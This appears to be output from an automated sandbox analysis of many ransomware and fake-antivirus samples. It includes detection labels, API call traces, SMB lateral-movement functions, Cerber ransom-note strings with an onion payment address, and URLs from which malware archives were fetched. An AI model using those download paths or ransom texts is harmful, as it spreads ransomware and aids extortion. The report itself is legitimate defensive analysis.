          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJoe Sandbox ML: detected
          Source: 11.0.Endermanch@Antivirus.exe.400000.0.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.1.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 17.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.Endermanch@BadRabbit.exe.1100000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.2.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 13.0.Endermanch@AntivirusPro2017.exe.400000.2.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 17.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.Endermanch@Antivirus.exe.400000.3.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 41.0.avpc2009.exe.400000.0.unpackAvira: Label: TR/Fake.avpc.94312
          Source: 13.0.Endermanch@AntivirusPro2017.exe.400000.0.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 13.0.Endermanch@AntivirusPro2017.exe.400000.1.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 11.0.Endermanch@Antivirus.exe.400000.1.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 17.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 49.0.antivirus-platinum.exe.400000.0.unpackAvira: Label: TR/Crypt.CFI.Gen
          Source: 11.0.Endermanch@Antivirus.exe.400000.2.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 13.0.Endermanch@AntivirusPro2017.exe.400000.3.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 16.0.Endermanch@BadRabbit.exe.1100000.3.unpackAvira: Label: TR/ATRAPS.Gen
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E26085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,20_2_04E26085
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E26299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,20_2_04E26299
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,20_2_04E25A73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,20_2_04E25613
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,20_2_04E25BC4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E215A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,20_2_04E215A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,20_2_04E2554A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,20_2_04E25507
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,20_2_04E25D0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E256D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,20_2_04E256D8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E26246 CryptCreateHash,CryptHashData,CryptGetHashParam,20_2_04E26246
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,20_2_04E25780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,20_2_04E2559B

          Exploits

          barindex
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:445
          Source: global trafficTCP traffic: 192.168.2.8:139
          Source: global trafficTCP traffic: 192.168.2.7:139
          Source: global trafficTCP traffic: 192.168.2.4:139
          Source: global trafficTCP traffic: 192.168.2.3:139
          Source: global trafficTCP traffic: 192.168.2.6:445
          Source: global trafficTCP traffic: 192.168.2.5:139
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:445
          Source: global trafficTCP traffic: 192.168.2.8:139
          Source: global trafficTCP traffic: 192.168.2.7:139
          Source: global trafficTCP traffic: 192.168.2.4:139
          Source: global trafficTCP traffic: 192.168.2.3:139
          Source: global trafficTCP traffic: 192.168.2.6:445
          Source: global trafficTCP traffic: 192.168.2.5:139
          Source: bpkAAJptGv.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.6:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.6:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49798 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.74:443 -> 192.168.2.6:49800 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.6:49810 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.6:49853 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49868 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.6:49871 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.89.179.12:443 -> 192.168.2.6:49883 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49895 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.6:49905 version: TLS 1.2
          Source: bpkAAJptGv.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 00000038.00000000.470518436.0000000000673000.00000002.00000001.01000000.00000023.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: c:\Users\PresFox\Documents\Visual Studio 2013\Projects\AdwareBooC\AdwareBooC\obj\Release\AdwareBooC.pdb source: Endermanch@FakeAdwCleaner.exe, 00000020.00000002.472217620.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000034.00000000.468943690.0000000000A52000.00000002.00000001.01000000.00000022.sdmp
          Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 00000038.00000000.471601413.0000000000692000.00000002.00000001.01000000.00000023.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 0000000B.00000000.380424832.00000000004AE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: C:\Users\Kyle\documents\visual studio 2010\Projects\HAPPY ANTIVIRUS\HAPPY ANTIVIRUS\obj\x86\Release\HAPPY ANTIVIRUS.pdb source: Endermanch@HappyAntivirus.exe, 00000027.00000000.461293572.0000000001038000.00000002.00000001.01000000.0000001B.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 0000000C.00000000.384419277.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AntivirusPlatinum.exe, 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AnViPC2009.exe, 0000000E.00000000.393289980.0000000000412000.00000002.00000001.01000000.0000000E.sdmp
          Source: Binary string: e:\pthreads\pthreads.2\pthreadVC2.pdb source: pthreadVC2.dll.14.dr
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 00000029.00000000.458422834.0000000000516000.00000002.00000001.01000000.0000001D.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000001B.00000000.425021627.0000000000A72000.00000002.00000001.01000000.00000016.sdmp

          Spreading

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$20_2_04E29534
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E29B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$20_2_04E29B63
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: z:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: x:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: v:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: t:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: r:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: p:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: n:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: l:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: j:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: h:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: f:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: b:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: y:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: w:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: u:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: s:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: q:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: o:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: m:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: k:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: i:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: g:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: e:
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: c:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: a:
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,12_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,12_2_0040AE97
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,20_2_04E25E9F

          Networking

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.8 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.7 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.6 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.5 139
          Source: TrafficSnort IDS: 2023614 ET TROJAN Ransomware/Cerber Checkin M3 (3) 192.168.2.6:63230 -> 93.107.12.0:6893
          Source: TrafficSnort IDS: 2809804 ETPRO MALWARE FakeAdwareCleaner.A Checkin 192.168.2.6:49811 -> 185.53.177.53:80
          Source: Endermanch@Cerber5.exe, 00000017.00000003.491861666.000000000540A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.491861666.000000000540A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.430982779.00000000053F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">S8aWa7</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">a3j3K</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/229D-A9FD-2C16-0098-B3AD</span><br>
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
